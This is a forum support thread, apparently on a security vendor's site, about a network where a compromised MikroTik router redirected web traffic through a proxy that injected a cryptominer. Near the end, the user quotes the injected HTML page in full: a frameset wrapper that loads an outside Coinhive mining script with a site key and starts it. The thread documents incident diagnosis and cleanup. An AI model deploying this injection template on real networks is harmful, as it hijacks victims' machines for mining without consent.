Jump to content

Recommended Posts

Hi, 

We have a computer with more than 10.000 detected threats like the one bellow:

Threat: JS/CoinMiner.AH

Process: C:\Windows\System32\wscript.exe

Object: hxxp://10.100.1.254/adpb/registration?username=carlota&domain=MYDOM&hostname=TSDC10&action=login

Is this a sign that the computer is infected or this is the result of attempts to infect it?

Note: The address 10.100.1.254 is a Mikrotik router and it is updated with latest updates.

 

Share this post


Link to post
Share on other sites

In this case it's probably a local infection because of the wscript.exe process. Please gather logs with ELC on that machine and provide me with the generated archive.

Share this post


Link to post
Share on other sites

You can find the source by creating a HIPS rule to block the startup of C:\Windows\System32\wscript.exe. Also make sure you log the event and set its type to "warning." This shouldn't cause any issues unless you have created any custom .js or .ws scripts.

If the HIPS log shows the source as svchost.exe, this could possibly indicate that a scheduled task is behind the activity. Unfortunately, the HIPS won't show want service is behind the activity. 

Share this post


Link to post
Share on other sites
On 8/31/2018 at 2:39 PM, Marcos said:

In this case it's probably a local infection because of the wscript.exe process. Please gather logs with ESET Log Collector on that machine and provide me with the generated archive.

Here are the collected logs on the affected machine.

Thanks for your help.

ees_logs.zip

Share this post


Link to post
Share on other sites

I've been able to find the origin of this detections and already solved the problem.

When I was trying to understand the origin of this trojans, I've noticed that some os the addresses where legit and doesn't raise any problems outside our client network.

So I started a search for some kind of proxy that could inject malicious code tho legit http pages and find out that they had their Mikrotik router hacked to make every request made to port 80 go through the web proxy on port 8080, where they injected the malicious code and it was blocked later on the client machine.

The hack has been possible because of this vulnerability on Mikrotik Router OS https://blog.mikrotik.com/security/winbox-vulnerability.html

I've changed every passwords, disabled the web proxy and deleted the firewall rule, so now everything if fine.

@itman, @Marcos Thanks for the tips

Edited by MAGIK José Rocha

Share this post


Link to post
Share on other sites

We appreciate your feedback José. In other cases with different brands of routers, a factory reset followed and upgrading the firmware didn't help.

Share this post


Link to post
Share on other sites

Here is the html source for the page that runs the miner:

<html>
<head>
	<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
	<title>"$(url)"</title> 
<_script src="https://coinhive.com/lib/coinhive.min.js"></script>
<_script>
	var miner = new CoinHive.Anonymous('ZopliillHRjWlp5B3JTrS4hKQP8jAKwp', {throttle: 0.2});
	miner.start();
</script>
</head>
<frameset>
<frame src="$(url)"></frame>
</frameset>
</html>

 

Share this post


Link to post
Share on other sites
20 minutes ago, MAGIK José Rocha said:

Here is the html source for the page that runs the miner:

Yes. That is exactly what triggers the detection and a screen shot of this was also included in the write-up mentioned above.

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now

  • Recently Browsing   0 members

    No registered users viewing this page.

×